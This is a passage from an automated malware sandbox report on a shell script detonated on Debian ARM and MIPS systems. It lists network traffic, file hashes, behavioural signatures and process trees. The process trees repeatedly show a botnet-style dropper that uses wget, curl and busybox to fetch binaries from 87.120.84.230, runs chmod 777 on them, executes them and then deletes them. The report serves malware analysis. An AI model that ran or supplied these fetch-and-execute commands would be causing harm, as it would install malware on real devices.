[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
US 151.101.193.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 195.181.164.14:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:03

Platform

debian9-armhf-20240729-en

Max time kernel

19s

Max time network

21s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/842-1-0xb66f0000-0xb6701044-memory.dmp

memory/859-2-0xb6764000-0xb6775044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:03

Platform

debian9-mipsbe-20240611-en

Max time kernel

151s

Max time network

155s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
